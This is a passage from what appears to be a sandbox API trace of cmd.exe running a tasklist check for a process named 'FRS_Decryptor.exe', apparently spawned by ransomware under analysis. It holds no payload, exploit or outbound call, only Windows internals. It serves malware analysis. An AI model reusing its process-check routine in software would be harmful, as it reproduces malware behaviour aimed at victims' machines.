lpType=0xbee888*=0x0, lpData=0xbee88c*=0x1, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x0, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x9, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x4, lpData=0xbee88c*=0x9, lpcbData=0xbee884*=0x4) returned 0x0 [0088.462] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbee888, lpData=0xbee88c, lpcbData=0xbee884*=0x1000 | out: lpType=0xbee888*=0x0, lpData=0xbee88c*=0x9, lpcbData=0xbee884*=0x1000) returned 0x2 [0088.462] RegCloseKey (hKey=0x44) returned 0x0 [0088.463] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50083 [0088.463] srand (_Seed=0x5aa50083) [0088.463] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0088.463] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0088.463] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0088.463] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe740c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0088.463] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.463] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.463] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0088.463] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0088.463] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0088.463] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0088.463] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0088.463] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0088.463] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0088.463] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0088.463] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0088.463] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0088.463] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0088.463] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbef660 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0088.463] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xbef660, lpFilePart=0xbef65c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef65c*="Desktop") returned 0x1c [0088.463] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0088.463] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbef3d8 | out: lpFindFileData=0xbef3d8) returned 0xe742d8 [0088.464] FindClose (in: hFindFile=0xe742d8 | out: hFindFile=0xe742d8) returned 1 [0088.464] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xbef3d8 | out: lpFindFileData=0xbef3d8) returned 0xe742d8 [0088.464] FindClose (in: hFindFile=0xe742d8 | out: hFindFile=0xe742d8) returned 1 [0088.464] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0088.464] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xbef3d8 | out: lpFindFileData=0xbef3d8) returned 0xe742d8 [0088.464] FindClose (in: hFindFile=0xe742d8 | out: hFindFile=0xe742d8) returned 1 [0088.464] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0088.464] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0088.464] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0088.464] GetEnvironmentStringsW () returned 0xe76190* [0088.464] FreeEnvironmentStringsA (penv="=") returned 1 [0088.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0088.464] GetConsoleOutputCP () returned 0x1b5 [0088.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0088.465] GetUserDefaultLCID () returned 0x409 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xbef78c, cchData=128 | out: lpLCData="0") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xbef78c, cchData=128 | out: lpLCData="0") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xbef78c, cchData=128 | out: lpLCData="1") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0088.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0088.465] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0088.466] GetConsoleTitleW (in: lpConsoleTitle=0xe74e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0088.466] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0088.466] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0088.466] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0088.467] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0088.467] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0088.467] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0088.467] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0088.467] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0088.467] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0088.467] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0088.468] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0088.468] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0088.468] _wcsicmp (_String1="IF", _String2="find") returned 3 [0088.468] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0088.468] _wcsicmp (_String1="REM", _String2="find") returned 12 [0088.468] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0088.468] _pipe (in: _PtHandles=0xe751f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xe751f0) returned 0 [0088.469] _dup (_FileHandle=1) returned 5 [0088.469] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0088.469] _close (_FileHandle=4) returned 0 [0088.469] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0088.469] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0088.469] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0088.469] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0088.469] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0088.469] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0088.469] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0088.469] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0088.469] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0088.469] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0088.469] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0088.469] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0088.469] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0088.469] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0088.469] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0088.469] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0088.469] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0088.469] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0088.469] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0088.469] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0088.469] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0088.469] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0088.469] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0088.469] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0088.469] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0088.469] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0088.469] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0088.470] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0088.470] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0088.470] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0088.470] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0088.470] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0088.470] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0088.470] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0088.470] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0088.470] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0088.470] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0088.470] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0088.470] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0088.470] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0088.470] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0088.470] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0088.470] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0088.470] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0088.470] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0088.470] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0088.470] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0088.470] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0088.470] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0088.470] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0088.470] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0088.470] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0088.470] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0088.470] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0088.470] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0088.470] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0088.470] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0088.470] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0088.470] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0088.470] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0088.470] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0088.470] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0088.471] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0088.471] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0088.471] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0088.471] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0088.471] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0088.471] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0088.471] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0088.471] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0088.471] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0088.471] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0088.471] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0088.471] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0088.471] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0088.471] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0088.471] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0088.471] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0088.471] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0088.471] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0088.471] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0088.471] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0088.471] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0088.471] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0088.471] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0088.471] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0088.471] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0088.471] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0088.471] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0088.471] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0088.471] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0088.471] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0088.471] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0088.471] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0088.471] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0088.471] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0088.471] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0088.471] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0088.471] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0088.471] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0088.471] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0088.471] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0088.472] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0088.472] SetErrorMode (uMode=0x0) returned 0x0 [0088.472] SetErrorMode (uMode=0x1) returned 0x0 [0088.472] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe75228, lpFilePart=0xbef5ec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef5ec*="Desktop") returned 0x1c [0088.472] SetErrorMode (uMode=0x0) returned 0x1 [0088.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.481] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.482] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xffffffff [0088.482] GetLastError () returned 0x2 [0088.482] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.482] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xe75530 [0088.482] FindClose (in: hFindFile=0xe75530 | out: hFindFile=0xe75530) returned 1 [0088.482] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xffffffff [0088.482] GetLastError () returned 0x2 [0088.482] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef378, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef378) returned 0xe75530 [0088.482] FindClose (in: hFindFile=0xe75530 | out: hFindFile=0xe75530) returned 1 [0088.482] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0088.482] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0088.482] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0088.482] SetErrorMode (uMode=0x0) returned 0x0 [0088.483] SetErrorMode (uMode=0x1) returned 0x0 [0088.483] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe7a3c0, lpFilePart=0xbef394 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef394*="Desktop") returned 0x1c [0088.483] SetErrorMode (uMode=0x0) returned 0x1 [0088.483] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0088.483] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0088.483] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.483] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.483] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xffffffff [0088.483] GetLastError () returned 0x2 [0088.483] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0088.483] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xe75628 [0088.483] FindClose (in: hFindFile=0xe75628 | out: hFindFile=0xe75628) returned 1 [0088.483] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xffffffff [0088.483] GetLastError () returned 0x2 [0088.483] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef120) returned 0xe75628 [0088.483] FindClose (in: hFindFile=0xe75628 | out: hFindFile=0xe75628) returned 1 [0088.483] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0088.483] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0088.484] GetConsoleTitleW (in: lpConsoleTitle=0xbef61c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.484] InitializeProcThreadAttributeList (in: lpAttributeList=0xbef548, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbef52c | out: lpAttributeList=0xbef548, lpSize=0xbef52c) returned 1 [0088.484] UpdateProcThreadAttribute (in: lpAttributeList=0xbef548, dwFlags=0x0, Attribute=0x60001, lpValue=0xbef534, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbef548, lpPreviousValue=0x0) returned 1 [0088.484] GetStartupInfoW (in: lpStartupInfo=0xbef580 | out: lpStartupInfo=0xbef580*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.484] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0088.485] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 